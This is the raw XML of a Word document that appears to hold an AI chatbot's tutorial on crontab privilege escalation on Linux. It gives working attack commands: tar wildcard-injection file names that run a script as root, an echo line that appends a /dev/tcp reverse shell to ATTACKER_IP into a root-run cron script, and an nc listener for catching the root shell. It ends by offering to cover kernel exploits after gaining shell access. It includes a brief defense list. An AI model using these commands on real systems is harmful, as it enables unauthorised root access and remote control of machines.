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570C" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">Alright — </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crontab-based privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve"> is another classic way to move from a low-privileged foothold to full control when you find </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>misconfigured scheduled tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37033A9B" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="3DEFFBBB">
          <v:rect id="_x0000_i1118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC1E95" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. How Crontab Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5DFE8A" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron daemon</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve"> runs scheduled commands at fixed times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FAC7C0" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">Cron jobs can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system-wide</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve"> (/etc/crontab, /etc/cron.*) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>per user</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve"> (via crontab -e).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE05DE" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">If a cron job runs as </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">, anything it executes inherits </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3C588" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="3A98F84B">
          <v:rect id="_x0000_i1119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="647DA881" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Misconfigurations to Look For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B63C3F" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>When you have access to a system, check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41321F7E" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a) World-writable scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF001D" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE41C1E" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317A4F5" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>ls -l /etc/cron* /var/spool/cron/crontabs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2020CC" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>If you see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44970B20" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>* * * * * root /path/to/script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71929C5E" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>…and script.sh is writable by you:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085C8DF" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>ls -l /path/to/script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777DD44" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>then you can modify it to run malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7053C4" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="197A3A67">
          <v:rect id="_x0000_i1120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A6CC7" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b) Writable directories in cron PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C01AF" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>If the cron job calls a binary without full path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1965EC" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>* * * * * root backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67F64A" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">…and backup isn’t in /bin/backup but in a writable directory you control, you can drop your own </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>malicious backup</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve"> file in that directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B602968" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="011F3D24">
          <v:rect id="_x0000_i1121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13216149" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c) Cron jobs with wildcard injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DF395" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>Sometimes cron jobs run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0096483D" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>tar cvf /backup/backup.tar *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E0CFA" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:lastRenderedPageBreak/>
        <w:t>If you can write to /backup/, you can create files with special names like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324A1DD" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>touch /backup/--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F627A2F" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>touch /backup/--checkpoint-action=exec=sh\ rootme.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6259B" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>…which executes your rootme.sh as root when the cron runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D7E8D" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="267938A4">
          <v:rect id="_x0000_i1122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBCDFDB" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Exploitation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4BF55" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>Let’s say /etc/crontab contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8CF380" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>* * * * * root /opt/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D664440" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>and you have write permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755216A" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>echo 'bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1' &gt;&gt; /opt/backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EFDB5D" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>Set up a listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF624A" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A931D" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">Wait a minute… and you’ll have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A9E65" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="137EA5A7">
          <v:rect id="_x0000_i1123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7B60E2" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Finding Cron Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B408FEC" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE380F" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>ls -l /etc/cron.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461983DF" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t>crontab -l  # for current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4D58E" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="7CA5ADE0">
          <v:rect id="_x0000_i1124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E196BA" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D605E3A" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t>Ensure scripts run by root are owned by root and not world-writable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B85E7" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>absolute paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve"> in cron jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CB68C" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t>Restrict write permissions on cron directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76940B92" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00835F61">
        <w:t>Monitor changes to /etc/crontab and cron scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288CE3C4" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:pict w14:anchorId="7B0C6764">
          <v:rect id="_x0000_i1125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A9644" w14:textId="77777777" w:rsidR="00835F61" w:rsidRPr="00835F61" w:rsidRDefault="00835F61" w:rsidP="00835F61">
      <w:r w:rsidRPr="00835F61">
        <w:t xml:space="preserve">If you want, I can next walk you through </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Kernel Exploit Suggestor" privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:t>, which is another step after Metasploit shell access — works when cron and sudoers tricks fail.</w:t>
      </w:r>
      <w:r w:rsidRPr="00835F61">
        <w:br/>
        <w:t>Would you like me to move to that one next?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053B6A6" w14:textId="77777777" w:rsidR="0000111E" w:rsidRPr="00835F61" w:rsidRDefault="0000111E" w:rsidP="00835F61"/>
    <w:sectPr w:rsidR="0000111E" w:rsidRPr="0083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97A3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4A8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34148"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="386AB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3379"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFF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90212"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1190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D67AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="874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8A7A38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AD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3126D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A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933072">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1626276932">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="610480724">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1116603025">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1714115639">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="731276137">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="60299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E4"/>
    <w:rsid w:val="0000111E"/>
    <w:rsid w:val="005E4A76"/>
    <w:rsid w:val="0072345A"/>
    <w:rsid w:val="007457D9"/>
    <w:rsid w:val="007B6C6E"/>
    <w:rsid w:val="00835F61"/>
    <w:rsid w:val="008475B7"/>
    <w:rsid w:val="00922AE4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33E45-93C1-4F8A-AFB3-4EF0B66A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E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E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E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E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AE4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AE4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AE4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AE4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AE4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AE4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22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AE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E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AE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22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AE4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22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AE4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22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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-15T02:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-15T04:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>